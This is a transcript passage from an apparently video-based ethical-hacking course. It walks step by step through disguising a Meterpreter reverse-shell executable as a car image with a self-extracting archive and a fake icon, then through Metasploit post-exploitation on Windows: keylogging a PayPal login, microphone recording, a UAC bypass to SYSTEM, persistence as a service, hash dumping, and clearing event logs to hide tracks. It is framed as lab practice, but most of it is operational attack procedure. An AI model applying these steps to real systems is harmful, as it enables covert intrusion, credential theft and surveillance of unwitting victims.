a car image. And what you will need for this is you're going to need a car image, or basically it doesn't even have to be an image or a car, it can be any file type that you want. If you want to create it to be a PDF file, you can. If you want to create it to be a JPEG file, you can. Just follow along, and the process of doing that is the same for every file type. So, two things you're going to need: a file that you want your executable to look like, and the executable itself. So this is the same payload from the previous video, which is a regular Windows Meterpreter shell. And what I'm going to do is I'm going to copy it to the desktop real quick. And once you got these two files on your desktop, you are ready to go. Now, the first thing that we must do is we must make an icon file from this PNG file. And how can we do that? Well, we can just open the Google Chrome or any search engine and type PNG to ICO. You can navigate to the first link in case you chose a PNG file, and it will lead you to this convertico.com, where it allows us to simply just upload our PNG image and it will create an icon file with that image. So I'm going to lower the screen. Then, as it says right here, drop your PNG files. I will drop it right here. It will take a few seconds, and right here our file should appear once it's done. Here it is. We can download it by pressing this arrow, and it will download the car.ico file for us. So I'm going to show it in folder, paste it on my desktop, and now we're good to go. We got the car.png, which is the image. We got this car.ico, which we're going to use to make our executable have this icon right here. And we're going to merge it with this PNG image in order for once the target executes our program, it also opens this image. Let me show you how it would look like. So all you want to do, you want to select these two files, right click on them and click Add to Archive. Click on this. Right here there are a few settings that we must set. First, archive format should be zip. Right here you want to check Create SFX Archive. And here you can name your file whatever you want. The only bad thing about this is that it will have an exe extension. But most of the people don't have extensions enabled on their Windows system, so this will not present that big of a problem. Okay, so let's go right here and call it car.exe. Then I want to go to the Advanced tab and click right here on SFX Options. This will open this small window, and we want to go through each tab and set the settings accordingly. In the Update tab, you want to click Extract and Update Files, and in the Overwrite mode, you want to overwrite all files. Then if I go to Text and Icon tab, here we want to click on this Load SFX icon from the file, click on Browse, find the ICO file that you just created. In my case, it is on my desktop, so I'm going to select it. Once you do that, you can move on to the next tab. So in the license tab, there is nothing that we want to set. Here also, there is nothing that we want to set. If I go to the advanced, nothing. In modes, we want to click on hide all and unpack to a temporary folder. After it, in the setup, we want to write both of our file names. So in the run after extraction, we want to type right here shell.exe. Just make sure you type the file's name right here correctly. So shell.exe is our executable and car.png is our image. Okay, good. Under the general, nothing here to do. So once you set all of those options, you can click on OK, and you can click right here on OK as well. And here it is. We got car.exe on our desktop. It has the icon of this image, and once we go and execute it, it should also open this image. But in the background, it should also run our shell.exe. Let's test it out. But first, we must set up our listener. So open terminal, run MSF console. Let's set up our listener. So multi-handler, set payload to be regular Windows Meterpreter reverse TCP. lhost will be the IP address of my Kali Linux machine, and lport, if I remember correctly, was 5555. Now I can run this. This will start the listener, and if I go to my desktop and execute this file, well, for some reason, it seems to have only opened this Meterpreter shell and it didn't open the car image, and this is something that happens sometimes. So we can try to change some of the settings in order to make this work, but in this case it was just a late opening. So here is the image, it opened right now. For some reason that took a few seconds, so let's just run it once again, just to see whether it will open faster right now. So I will run the listener once again and open car.exe. It still seems to take some time, even though our Meterpreter shell is open. So what we can do instead of this is we can first of all exit this shell, close this image that opened 10 seconds after we executed, and we can start the MSF console again, delete this file, and we're going to change one setting which will hopefully make our file execute faster. So let's go once again, zip. Here we want to name the file to be car.exe. Under the advanced SFX options, and here under the setup is something that we want to change. So last time we specified the shell.exe first, right now we're going to specify car.png first. And under it I'm going to specify shell.exe. Then I'm going to click right here, hide all. In the general, nothing. In the update, extract and update files, overwrite all files, text and icon. Let's select our icon file. In the license and module there is nothing, so let's just click on OK. It will create our file once again. Not sure why I closed MSF console when right now we are going to set up our listener again, and multi-handler, Meterpreter, set lhost, and the L port. We want to run it, run the file, and now it opens the image straight away. Okay, so just make sure that you specify the image name first, and then after it you can specify the shell name. And here we also got the Meterpreter session opened. We can execute commands as usual, so our program works good. It has an icon of an image, it also opens an image. The only problem is this exe extension. And there are some of the ways that you can fix this and make it seem like it doesn't have an exe extension, but most of those ways automatically get detected by any antivirus out there. Okay, great. Now that we covered this, we are ready to finally get into the post-exploitation section. And here we're going to go into details with the Meterpreter shell, what options it has, and what post-exploitation modules we can run after hacking the target. See you in the next video. And welcome back. Time to touch on a subject of post-exploitation. We have traveled a long way from the beginning. We covered information gathering, where we tried to get as much information about our target that we would find useful for a future attack. After it, we scanned our target from technical aspect and we discovered its open ports and softwares that it runs. We then used different tools to figure out whether that target has any known vulnerability that we might be able to exploit. And then we exploited many different targets from Linux Metasploitable to Windows 7 and Windows 10. We both saw how to exploit its vulnerabilities, and then after it, we created our own payloads that we executed on the target system. Now comes the part after the exploitation. What are we going to do now that we're on the target system? What are we looking for, and what cool things can we even do? Well, we have lots and lots of options, depending on what we want to find, of course. For example, the most simple thing we can do is scroll through their file system and look through what files and programs they have on their machine. Maybe we could find something interesting, such as saved passwords inside of a file, or some other important files for that company that are laying on that machine unprotected. We could also download files from that machine and also upload files to it in case we want to send another payload or another executable that we want to run on their system. We can do all of this with our Meterpreter shell just by running a few commands. Talking about passwords, that is also something that we would look for. We could try to extract saved passwords from browsers, for example. Remember when you click on that button that says Remember Me once you log into some web page? Well, those passwords could be stored somewhere on their machine. And why would we go for passwords? You might be asking. Well, getting targets' online accounts just expands our access to them. Imagine you were to get their PayPal password and gain access to their PayPal account. That wouldn't be so pretty for them, since you would have access to all of their funds. Another thing we could try to do is gain access to the entire network from the target machine that we hacked. Maybe inside of company's network you manage to get access to one machine, but it doesn't have all the things you might need. Maybe some important files could be on some other machine from that same network. In that case, you would want to try to hack that other machine from the machine that you already hacked. Now, you might be wondering, well, why not from our Kali Linux machine? Well, maybe machines that belong to that network have more trust between one another. Maybe they exchange files or communicate with some other software altogether on that same network. In that sense, it would be easier to get access to one of those machines from a system that is already inside of their network, right? Maybe we would also want to run a keylogger on the machine we got access to. Now, keylogger is a program that captures every keyboard input from that machine. So with this, not only we could maybe capture some passwords that the user of that machine would input in some secured website or software, but we would also be able to see everything else that he or she typed. From what they searched on the internet to maybe the messages that they're sending on social media from that machine, or basically anything that they type in the keyboard, we will be able to see it. Amazing, right? You can picture post-exploitation as some type of a information gathering on the target system. And these things that we talked about are just a small portion of what we can do once we hack a machine. Now that we briefly talked about post-exploitation theory, let us see what available tools and commands we can use to achieve all of the things that we mentioned and even more. See you in the next video. Time to finally figure out our possibilities with the Meterpreter shell. In the last section, we focused so much on how to gain access in many different ways, and we popped a Meterpreter shell so many times. But we never got to see its true power and all of its commands. We only ran a few of them just to make sure the connection was successful. Now, we're going to go real quick through the basic commands that we can do with the Meterpreter shell, and then after it, we will see some of the post-exploitation modules and how we can run them. So for this, I already got the shell opened, as we can see right here, Meterpreter session 1 opened, I ran my file, which is shell.exe, and by now all of us should know how to do this. Just send the payload to the target, execute it, and you should have a Meterpreter session on their machine. From here, we can run the help command to see all of the available commands with the Meterpreter shell. If I scroll all the way up, and we are going to start from the beginning, the first section of the commands that we get are called core commands. And these commands we are going to brush through real quick. We're just going to mention a few of them that we already know, such as for example this background or BG. If you type background in your Meterpreter shell, this will background your session, and you will be able to use your Metasploit framework module. When is this command useful? Well, if I type the command sessions that we already know, we got one session currently. But you might have a session with multiple targets. And in order to navigate between each and every session, you can use the background command to put this Meterpreter session in the background and, for example, enter a different session with a different machine. So that command is useful in that sense. Of course, you don't need to type the background command, you can simply just type instead BG, and it will do the same thing. So if I go back to my session and go back to my help command, we can scroll back to the core commands and read some of them and what do they do. So just go to this menu, and most of them we're going to cover later on. For now, we are not going to touch them, because most of these are not needed for us at the moment. For example, you know that you can exit the Meterpreter shell with this exit command, background the shell with background command. Here we can see how we can switch between different sessions, and you can get the user ID. I believe get UID command is right here. Here it is, get UID, get the session UID. So if I type that right here, it will tell me the session UID. We also know the command get user ID, and this will tell us which user are we on the target machine. Okay, so these are just some of the core commands, and of course you can experiment with others, but some of them we're going to cover later on. For now on, you can just read through this menu and go to the file system commands. And these file system commands, you can just picture them as commands that we use inside of a terminal. So we can change directories, we can print current working directories, list all of the files on the target system, and let's see how that would work. So if I go down here, and to see in which directory I am, I can type the command print working directory. It will tell me that I am currently in the /desktop directory on the target machine. Now why am I here? Well, because the shell.exe inside of that directory, and once the target executed it, our Meterpreter session will automatically be inside of the directory where the payload is. Okay? If I wanted to list all of the files inside of here, I can type the dir command, and I can also type the ls command. So it supports both Linux command and Windows command. Dir is used to list files inside of a Windows system. So we can see what files we have right here, and maybe we could find something interesting right here. For example, we get this passwords.txt file. And of course I created this on purpose just for this tutorial, but this is something that occurs quite often. Matter of fact, years ago, even I had this file where I've written down all of the passwords that I couldn't remember for different websites. And to read the content of this passwords.txt file, we can use a familiar command for us, which is the cat command. So if I type cat passwords.txt, press enter, this will print out all of the content inside of this file. We can see the router, username and password, the Facebook username and password, and the PayPal email and password. So this is something that you could possibly run on. And you want to see the contents, just type the cat command. Of course, we don't need to be inside of this directory if we don't want to. We can use our regular cd command to go one directory back, and if we type pwd, we're no longer in the /desktop directory. Here we can type dir once again to list out all of the files inside of this directory. If we wanted to choose one of these directories, we can go back to them, but for now on, let's just go back to the desktop directory. Great, if I type dir, here are our desktop files, and if we wanted to, we could also download a file from the target machine. So how can we do that? Well, it is as simple as just typing download and then the file name. In this case, let us say we want to download, for example, passwords.txt. I press enter, and here it is. It will download it for us. Now, I'm not sure where by default the Meterpreter saves these files, but it could be right here on the desktop, and here it is. Here is the passwords.txt. And you can also upload files if you want to. For example, let's say we want to upload this ratbackdoor.txt from one of the previous videos to the target machine. We can see right now we don't have it on the desktop, on the target machine, but if I type upload and then ratbackdoor.txt, press enter, go back to the desktop just to check out, and here is our file. We successfully uploaded another executable to the target system. Then we could use something like a shell to execute that file. Okay, but we're not going to do that right now. Let us exit out of the shell and run the help command once again just to see what else we can do. Inside of the file system commands, we also get the commands on how we can create and remove files. So we can use rmdir to remove a folder. We can use rm to delete the specified file. So for example, we want to delete a file on their desktop. We can do that using the regular rm command. We can also create a directory and create files if we want to. So let's see, for example, if we manage to delete the rat backdoor that we just uploaded. We don't want it there, so let us just delete it real quick. Run the rm command and it is no longer here. And let's say we want to create the test directory. and we want to copy passwords.txt in the test directory. Access is denied. Let us just check out right here. We got the test directory, but for some reason we can't seem to copy this file. And this could be due to many different reasons. But the main reason will probably be because we are not an administrator on the target machine. And we're going to check out in some future video how we can become an administrator and system level account just by getting the Meterpreter shell as a regular user. Remember, if I run the getuid, we're just a regular user. We are not the system level account. But more about that later on. For now on, let us run the help command once again. And you can play with these file system commands that we have right here, but they're just regular commands that we can run inside of a Kali Linux terminal. Just this time you're running it on the target machine. Inside of the networking commands, we only have a few of them, so let's just test 2 or 3 of them. For example, this ARP command will display the host ARP cache. So with this, we should be able to see the IP addresses and their correspondent MAC addresses. These are all of the IP addresses that are inside of our ARP tables on the Windows machine. So we have our Kali Linux IP address because we are currently communicating with our target machine from our Kali Linux IP address, therefore it must have our Kali Linux IP address in the ARP tables. We also get the router's IP address, the broadcast IP address, and all of these down here are not that important. If I run the ifconfig command, of course I will be able to see all of the networking interfaces on the target system, as well as the IP address that the target currently has. If I run the command, for example, netstat, this will print out all of the connections that our target machine currently has. So we can see right here the connections, the IP addresses, which protocol are they using in case these are using TCP, and down here we have UDP protocol. If I go up here, we should be able to find our shell.txt that established a connection with the Kali Linux IP address. So we know that 192.168.1.4 is the IP address of my Windows 10 target machine. And here, if I go and find the IP address of Kali Linux machine, and here it is, we can see it is running on port 5555. The connection is established, and the process that is causing this connection is shell.exe, or our payload. Great. Now, if you want to, you can go up here and experiment with the other commands as well. But these are not that interesting or important for us at the moment. What is important, and what we will cover in the next video, are these system commands and user interface commands. We want to see some of the cool stuff such as capturing keystrokes or running a keylogger, running a screenshot on the target desktop, maybe for example recording microphone, recording webcam, all of that we want to check out and see how we can run them. And we will do that in the next video. So experiment with the commands that we covered a little bit. Feel free to run the others as well if you want to check out what do they do. And I will see you in the next lecture. Let's continue with our Meterpreter commands. So we only covered navigating through file system and some essential commands between switching sessions inside of a Meterpreter. But we didn't really touch on those interesting commands such as running keylogger or snapping a screenshot or recording microphone. But before we get to them, there is one portion of the commands that we must go through first, and those are system commands. Let us run the help menu to check them out. So if I scroll all the way up, right after the networking commands, we should see the system commands. And here there are a few interesting ones. For example, let's start with this execute command right here. So this command allows us to execute any type of the command that we would use inside of a shell. It will most likely run this on a separate thread, so we will be able to execute different commands simultaneously. Let me show you what I mean. So for example, let's say that I want to start a calculator on the target machine. I can type execute calc, and here it will tell me that I need to specify the -F option. Process 9096 is created, and right here I got my calculator opened. Now if I wanted to terminate this process or any other process, Inside of the system commands, we also get this kill command that says terminate a process. But for this command, we need to know the process ID. So here we got the process ID as soon as we started this process, but let's say we wanted to terminate a different process. How would we get its process ID? Well, remember, we can type the command ps to list out all of the files that are currently running on the target system. And this left column right here is the process ID. If I scroll all the way up, here we can see PID or process ID. And I can scroll all the way down, and at the end, somewhere around here, we should see our calculator being open. Let's go and search it. So search for the calculator application. And if I scroll a little bit up, we should be able to find it somewhere around here. And here it is, calculator.exe. So we can see the process ID is 8412. Let's try to kill this process and see whether our calculator closes. So if I go and copy this process ID, 8412, and down here I type kill and then paste the process ID, here we can see the calculator is now gone. So we can start different programs and terminate different programs if we want to using a Meterpreter shell. A few more interesting commands from the system commands would be probably this reboot command that reboots the remote computer. Now, I'm not going to test this because I'm running my shell on the main Windows 10 operating system, so rebooting that machine would be no good since I'm also recording on it. Besides rebooting, we can also shut down the target machine just by specifying the command shutdown, and you can test both of these commands on a virtual machine. And at the end, we also get the system information, so gets information about the remote system such as OS. And that is always useful to know, some of the additional information about the target machine. Here we can see the computer, the OS, the architecture, the system language, and other options as well. But I said that we're going to cover some of the interesting commands right here in this video, and let's get straight into them. So after the system commands, we get these user interface commands. And here we can control mouse, keyboard, record microphones, run screenshots, and a bunch of other cool options that we're going to cover right now. So let's start, for example, with this mouse option. Send mouse events. Let's see how that would work. If I just type mouse inside of the Meterpreter, it gives us a small usage for this command. So mouse and then the action, we can type click, up, down, right click, right up, right down, double click, and so on and so on. We can also move the mouse if we want to. So let's try this command. If I copy, mouse move, and then paste right here, let us put the mouse right here, and if I press enter, here the mouse moved on its own. Let's do it once again. Did you see it? It moves on its own, so we can control the mouse on the target machine. Now, even though this is cool, it is not really that useful. However, there are other commands that we would find a lot more useful than these, such as, for example, running a keylogger. Let's see how we can run a simple keylogger. So if I scroll all the way up, here we get the commands keyscan start, keyscan stop, and keyscan dump. Let's give them a try. If I copy this command that says start capturing keystrokes, input it inside of my Meterpreter, it says starting the keystroke sniffer. Now let's go to this page, and this is a PayPal page, and I'm just going to type something random right here. So let's say example@gmail.com, and password will be test1234. If I click on login, of course this account does not exist, but let's go right here and see whether our Meterpreter shell managed to capture it. To print out the keystrokes that were captured, we can type keyscan_dump. Press enter, and here it is, example shift@gmail.com, and here is the password, test1234. To stop a keylogger, we can type keyscan_stop, and this will stop capturing keystrokes. So this is really useful if you want to capture the messages that they're sending online, or basically whatever they type on their keyboard, you can capture it by typing keyscan_start, and then you can type keyscan_dump to dump all of the keystrokes that they captured in that specific time lapse. Great. Let's check out more options as well. So another interesting one is the one that we already covered, which is the screenshot option. As it says, grab a screenshot of the interactive desktop. If we run it real quick, this will save a screenshot inside of the /home/MrHacker directory. And we can visit it by clicking on this, open folder, and here is the screenshot. So it is the screenshot of our Kali Linux machine because my Kali Linux machine is running on this Windows 10 machine. But what if I wanted to, for example, see what the target is doing, or simply just record the screen at the live time? Well, there is a command called screen share, and it says watch the remote user's desktop in real time. We can type it right here, screen share, and this will start streaming the target's desktop to our Kali Linux machine. Here it is. Now, this command knows to be a little bit buggy, as it does require some of the power in order to run. As we can see right here, it can be buggy sometimes, but nonetheless, we can see the target's desktop. Let us close this real quick, and another command that I wanted to show you that is really cool is recording the target's desktop. How we can do that? If I type the help command, go up here. Here we can see these commands right here. Record mic, record audio from the default microphone for X seconds. We can also stream the webcam and take a snapshot from the specified webcam using these commands right here. But since my Windows 10 machine doesn't have a webcam, I'm not going to be running this. Of course, you can test these commands out if you got a webcam and see if they work. For now on, I'm going to record microphone on our Windows 10 target machine. Now, this command requires a parameter. We can specify the amount of seconds using -D option, and I will specify 10 seconds. If I press here enter, this will start recording and it should capture what I'm speaking at the moment to the microphone. So here the 10 seconds finished and it saved the file inside of the /home/MrHacker, and this is the file name. You can listen it if you want to, but for now on, let us check out what other commands we have at the end of the help menu, and we got these cool commands such as get system and #dump. And believe it or not, these commands could be the most useful out of all of the others that we covered. However, if I try to run the get system command inside of my Meterpreter shell, operation failed. They will not work. It seems we cannot get system privileges on the target machine. And just to remind you, system privileges are highest privileges on the Windows machine, even higher than the administrator. Once we get system level account, we can say we fully hacked that box. So what are we going to do? Well, we're going to try to elevate our privileges in the next video by using post-exploitation modules. For now, we covered basic Meterpreter commands, and you saw how useful they are despite being so easy to run. We simply got a screenshot by running one command, we recorded the microphone by running one command, but it is time to get into more advanced things and running more advanced modules. See you in the next video. Welcome back. Time to see how we can try to elevate our privileges on the target machine. But before we do that, I just want to play you this recording that we recorded from the previous video using Meterpreter and the record mic command, just to see that we indeed managed to record the sound on the target machine. So if I play it, this will start recording and it should capture what I'm speaking at the moment to the microphone. You can see it did manage to record it. Now, it is not that high quality of a sound, but nonetheless, we can hear what the target spoke on the microphone. Nonetheless, let's get back to the privilege escalation, and privilege escalation is a big topic and a more advanced topic. There are many advanced techniques that can be used to try to elevate privileges. However, we're going to be covering the scripts we can use to automate those processes. All of those scripts we have available inside of our Metasploit framework. Now, usually we don't know whether we can elevate privileges or not. Throughout the years, there have been many exploits that got patched for the privilege escalation. However, maybe our target skipped some patch and is vulnerable to one of them. So what we're left is just to try all of those scripts out and see if some of them works. What we can do to search for the privilege escalation exploits is we can first background this session that we got with our Windows 10 machine, and we can type search bypass UAC. What does this mean? Well, UAC is user account control, and these exploits that we will find are used to bypass it, which could allow us to elevate our program privileges to the system level. Another thing I like to search is type search and then the year that we're currently in. Since we're at the end of 2020, we can type 2020 or search 2020. And this will list out all the modules that came out this year. Inside of these modules, we will have everything, so what we want to search and filter out is Windows exploits and preferably local Windows exploits, as we can see right here. What does local mean? It means it's getting executed on the system itself. Usually, these type of local exploits try to elevate privileges. For example, here we can see a few of them, such as exploit Windows local and then this name. Up here we got another local exploit and many more are right here. And we can also see the SMB Ghost exploit. Now, I know what you're thinking, I did say that Metasploit framework doesn't have SMB Ghost module. Well, that wasn't true. However, this module is a local exploit and it's only useful after you're already on the target machine. As we can see, it is exploit for Windows, but it is also a local exploit. The one that we covered is the same vulnerability inside the SMB version 3, just we exploited it remotely from another computer to gain a shell. But let's test it out, just to see whether we manage to elevate our privileges using this exploit. So to use it, we can type use and paste the exploit. Just make sure that you got the active session with the target machine. As you can see right here, I got session 1 active on the user account of the Windows 10 machine. If I type show info for this exploit, we can read that this is a vulnerability that exists within the Microsoft Server Message Block 3.1.1 protocol that can be leveraged to execute code on a vulnerable server. So we can see the targets right here, and all we need to set is the session ID. To do that, we can type the sessions command, check out the session ID that we got, and type set session and then 1. If I type run to execute this local exploit, well, seems that it did something, but we didn't get a shell back, so we can assume it doesn't work. Let's try another one. If I type search 2020, and for example, let us say I'm going to use this one, which is exploit Windows local CVE 2020 service tracing, and the reason why I'm using this one is because down here it says privilege elevation vulnerability. So this can be used to elevate privileges in case our target machine is vulnerable. Let's check it out. Press enter, type show info just to check out what this module does, and this module leverages a trusted file overwrite with the DLL hijacking vulnerability to gain system level access on vulnerable Windows 10 64-bit targets. So our targets do match and we do want to gain system level access, so let us see whether this will work. There is only one thing that we must set and that is required, and that option is the session. So let's type set session and then 1, press enter and run the exploit. Failed to validate lhost, so let us type show options just to see which payload we got, and we need to set lhost to be 192.168.1.12, which is the IP address of my Kali Linux machine. Now also make sure that the L port is different than the port that you got active inside of a session. Since I got port 5555 active in the current session, I can specify right here 4444. But if your Meterpreter session is running on port 4444, you need to specify a different local port, otherwise none of these exploits will work. So I can leave it on 4444 and type run and it seems that this one doesn't work either. Let's try from the UAC bypass exploits. So I will type search bypass UAC, and here I will see all of the exploits for user account control bypass. Now, you can go ahead and try all of these local Windows bypass UAC exploits to see which ones work. Just make sure you read information about them first before running them. But what I'm going to use in this case is this FOD helper bypass UAC. It is from 2017 and it showed to work a lot of times in my personal experience. So I will copy the name, type use, and then I will paste the name right here. Press enter. It configured the payload and let's give it a try. If I type show information just to see what it does, it will tell me this module will bypass Windows 10 user account control by hijacking a special key in the registry under the current user Hive and inserting a custom command that will get invoked when the Windows FODHelper.exe application is launched. It will spawn a second shell that has the UAC flag turned off. So let's see what are our options that we must set. And we need to set the session. In my case, it is session 1. And I can use the local port 4444. And if I type run, here it is. We got another session open. We got the interpreter opened. And this is a different session. As you can see, it is running on port 4444. So we got a shell back with this local exploit. But if I try to run the command get user ID, it will say that we're still the same account that we were before. But remember, it said in the module description that this exploit will spawn a second shell with the user account control flag turned off. What does this mean? Well, it means that if we try once again to run the command get system, that didn't work before, now we are the system account. We did it. Right now we can say we fully owned this Windows 10 target machine, since there is nothing that we can do on it right now. And just to prove to you, I will type get user ID once again and it will tell me that I am authority system account. So feel free to test out other modules to see if they work or not, and you can also try these modules on our Windows 7 virtual machine just to see how that would go. Great. Now that we elevated our privileges, let us check out other post-exploitation modules that we can also run. See you in the next video. Welcome back. And in this video, I want to talk about something called persistence. And what is persistence? Well, persistence is a module that allows us to stay on the target machine even after the target machine gets rebooted. So it is essentially adding our payload to the startup folders where it will automatically get started as soon as the target system gets restarted. It is a part of maintaining access. So this is one of the things that we want to do as soon as we get on the target machine. So what I did right here is I established a interpreter session with the target machine. I used this module to bypass UAC and get system privileges on my Windows 10 virtual machine. And the reason why I'm testing this on a virtual machine is because in this video I will have to restart this machine to see whether the persistence is working. And how I transferred the shell.exe to the Windows 10? Well, I used a cool way of transferring it using the Apache 2 web server. And to do that, you can simply just type system ctl and then start and then type Apache 2. This will ask you for your password, input it right here, and this will start the Apache 2 web server. Now what you can do is you can open up Internet Explorer on the target machine and type in the IP address of your Kali Linux, which will lead you to the web page of our Kali Linux machine. Now, you will not see this shell.exe right there. It is there because I put the payload inside of the web server directory. And to do that inside of your Kali Linux, after you create the payload, you can navigate to the /var /www and /html directory, where you should have two files called index and then .something. You can delete those files and you can copy your payload to this HTML directory right here. Then if you go to your Windows 10 machine, refresh the page, you will have your shell.exe available to download on your Windows 10 machine. Just make sure that you disable the Windows Defender on your Windows 10 machine, because we're using a regular Meterpreter reverse TCP shell, and it gets detected by Windows Defender. So after you do all of that and establish the connection, you can then gain system privileges, and we already know how to do that. We simply just test a bunch of those modules that are used to bypass UAC, and then we become the system level account. Once you do all of that, it is time to run the persistence module. So how can we do that? Well, first of all, I will background this session, and if I type sessions, you can see I have two sessions available. The one is on the regular user account, and the one is that I elevated, which is this system level account. So what I want to do to run the persistence is I can type this search persistence inside of my Metasploit framework. This will output me with a bunch of different modules. And the one that we're going to cover in this video is going to be this one right here. Exploit, Windows, local, and then persistence service. If I copy the module name, go down here and type use, paste the module, press enter. It will set my payload to Windows Meterpreter reverse TCP, and if I type show info, here we can see that this module would generate and upload an executable to a remote host. Next, it will make a persistent service. It will create a new service which will start the payload whenever the service is running. Admin or system privilege is required for this module to run. That is why we created a second session with the system privileges. So what we need to specify right here, if I type show options, is we need to set the session, and here we're going to set the session with the system level account. In my case, I believe it is session 2. That is correct. And right here, we want to set our payload options. Of course, if you want to, you can set these other options as well, such as retry time. And retry time is simply just the time that shell will retry to connect to if the connection fails. 5 seconds is default. Now we can set that to be, for example, 10 seconds. It doesn't have to be 5. That would be too quick. And after we do all of that, we can run this module. Press run, and this will open the session 3. If I type get user ID, we will be the system level account, but what is special about this session is that it will automatically connect back to us even after the target machine is rebooted. So the target won't need to run this shell.exe after the system is restarted. It will automatically connect back to us again, because we ran this persistence module. Let me show you what I mean. If in my Meterpreter session I run the reboot command, press enter, this will start restarting the Windows 10 machine. All of the other sessions will die out because the connection has been closed. If I Ctrl+C this, exit out of this, type sessions, we will have no active sessions anymore. So what we can do right now is we can type use exploit multi-handler, set the correct payload, and inside of the show options, we want to set the correct options that we used inside of our persistence module. And that is the port 4444 and the IP address of our Kali Linux machine. So all I need to do right now is type run. And here we get the session open because this machine hasn't yet shut down. So we're just going to close this because this is not the session that we wanted to. And I'm going to manually exit out of this machine and go and start it once again. Now that the machine is getting started up, I will run our listener. And if everything worked correctly, we should get a Meterpreter session opened as soon as the machine boots up, without the target having to do anything but start their machine. So let's see whether it will work. The machine is currently starting up, and let's give it a few seconds. And here it is. Our Meterpreter session 5 opened on its own. And notice that it didn't even log in to the user yet. And the best part about this is that if I type get user ID, I will already be system level account. So I don't have to go through the privilege escalation process again. This Meterpreter session opened without anyone clicking on anything. And that is the good part about persistence. Now, even if the target shut down this PC once again and started it in a week or two, our persistence will still work and our payload will automatically connect back to our Kali Linux machine, if the IP address of the Kali Linux machine hasn't changed, of course. One more thing to keep in mind is that sometimes persistence can be buggy, so it knows not to work sometimes. But in most cases it should work. And if it doesn't, there are other modules for persistence as well. If I type background and search persistence, I used this module right here. But you can see there are other modules as well. You can check them out if you want to. Maybe they will work better, maybe they will suit your needs more, but whichever one you find to work, just use it and you will maintain access on the target system. Great, now that we covered persistence, in the next video we're going to cover the usage of post-exploitation modules and a few more useful commands that we can do after exploiting the target. See you in the next video. Welcome back, and in this video I want to talk about a few more useful commands and post-exploitation modules. So what I got right here, I established my Meterpreter session with my Windows 10 main machine, and now let's see what else could we find useful after exploiting the target. Well, if I type the help command, somewhere around here I believe there should be an option called search. And what search allows us to do is to, for example, search for specific file types on the target system. So if I type search-h, this will give me an options that I can use with this command. For example, if I wanted to find all the JPEG pictures on the target system, what I could do is I could type search-f and then $.jpg. Press enter, and what this is going to do is it will manage to extract all the JPEG images that are located on the target system. Now you can also do for any other file type that you want, and you can also mix it with one of these options right here. And here are the results. We can see there are a lot of them. All of these are JPEG files, as we can see right here. Now if we scroll all the way up, we can see that the list goes on and on. So maybe we would want to narrow it down if we were searching for something specific. But right now, we got all of the JPEG files on the target system. Okay, another thing that I want to show you is the usage of post-exploitation modules. How can we do that? Well, if I go and put my session in the background, clear the screen, and since we are on a Windows machine, what we can do to search for the post-exploitation modules is we can type search and then post/Windows. Press enter, and this will list out all 191 post-exploitation modules. And you can scroll through them and see which ones you would find useful. For example, if your target has a wireless card and it connects to the wireless access point, you can use this module, type use and then the module name, show options, and usually these modules will only want the session ID, so they're very easy to run. You can simply just set the session ID to, first of all, let's check out what session ID we have, and it is 1, so set session ID to 1. Then run the program, and this will list out all of the wireless interfaces and possibly the passwords of the connected wireless access points. Now, since my machine doesn't have a wireless interface, it simply just prints out no wireless interfaces. So these post-exploitation modules depend on what you're looking for. So let's scroll a little bit up and see which type of modules we have. So we got a bunch of enumeration modules. You can enumerate Chrome to extract all the Chrome data you can find inside of that browser in case the target is using Chrome. Check for VMs, so you can use this module, for example, to check out whether the target that you managed to hack uses a virtual machine, or if it's a virtual machine. So let's see how that would work. We know that my Windows 10 main machine is not a virtual machine, so it should give out false as a result. So set session 1, run this, checking if my target machine is a virtual one, and it says it appears to be a physical machine, which is correct. You can also be more specific when searching for the post-exploitation module, such as, for example, type search and then passwords. And we can see right here we get some post-exploitation modules for gathering passwords, credentials, total commanders, saved password extraction. Let's go a little bit up, see what else we have. Not really too interesting. However, one module that we can use to extract the hashed versions of passwords on a Windows machine is we can type search and then hash dump. Then we can scroll a little bit up and we got somewhere around here a module, here it is, called post windows gather and then hash dump. So let's copy it, type use and then paste the module name. If I type show options, set the session to be 1, as you can see they're very easy to run, only one option is required, and I type run, it will tell me access is denied. So this simply means that I'm not a system level account. We know how we can fix that, so I'm just going to do that real quick, just to show you what this hash dump post exploitation module outputs once it works. So I'm going to real quick elevate privileges. And here it is, the privilege escalation worked from the second try, and I'm going to type get system background is session and now use post windows gather and then hash dump. Set session to be session 2 because the session 2 in this case is the session with the system level account. And if I type run, this should give me the hashes of all the users on that Windows machine. And here they are. We got the administrator hash, we got the user hash, and we got some other hashes as well. And we could use them to crack them with some other program, but more about password cracking later on in the course. For now, we just managed to extract the hashes. Another useful option that we have that requires system privileges inside of the Meterpreter shell. If I go inside of my system level account shell and I type the help menu, scroll a little bit up, I should see this option called clear EV, and this stands for clear the event log. What does this mean? Well, this command will clear application, system and security logs on a Windows system. So it is something similar to covering up our tracks. How can we run them? Well, it takes no other parameters, so all we need is a system privileged account and we can type clear event. And we can see right here, it is wiping out records from application, system and security. And another thing that I want to show you before I close off this video is that you can run post-exploitation modules even from the Meterpreter shell. So you don't need to always put it inside of the background in order to run a post-exploitation module. You can simply just type run and then the module name. For example, I will use this one, so post windows gather and then enum underscore applications. And if I press enter, what this post module will do is it will print out all of the installed applications on my Windows 10 machine. And we can see them right here. So many different modules exist. We saw there are hundreds of post-exploitation modules. You run all of them the same way, so you can simply just go and search through them and find which one is useful for you. Then you can test them out and see how they work. Great, now that we covered all of this, you have a pretty good understanding of what post-exploitation is. So let's just remind ourselves of the most important things that we do after exploiting the target. We try to elevate our privileges, we create persistence in order to be able to enter that machine whenever we want, and we search for useful information on that target machine, such as password hashes, such as different files that we might find useful, and those are the main parts of post-exploitation module. Of course, you can then use the commands like clear event and other commands that are used to cover up your tracks and delete the log files, which could be useful to cyber forensics in case they want to track back the person that was on that machine. So thank you for watching this video, and I will see you in the next lecture. Welcome back. It's time for a small break. We covered a full penetration test by now. Or you can say we covered how it would look like and how would we perform a penetration test. We went from gathering information about our target, from personal and technical information, to then later performing a scan to figure out the target's infrastructure and if we could find some openings or vulnerabilities to attack. After doing that, we gained access to the target by either exploiting through a vulnerability or delivering a payload that the target will execute. And at the end, we performed post-exploitation with the payload that we delivered. From stealing information with a keylogger, to downloading files from their machine or maintaining access. We did all of that. And you can say we completed the penetration testing circle. We did all of this on both Windows and Linux targets. And the next step that you could take is to practice all of these things that we learned on various virtual machines that you can download online and that have different vulnerabilities. Machines that are similar to our Metasploitable. You can also subscribe to different online programs that host vulnerable machines that allow you to test them and advance your skills even more through testing those machines. However, more about all of this I will say at the end of the course. And even after covering all of this, we are still not done 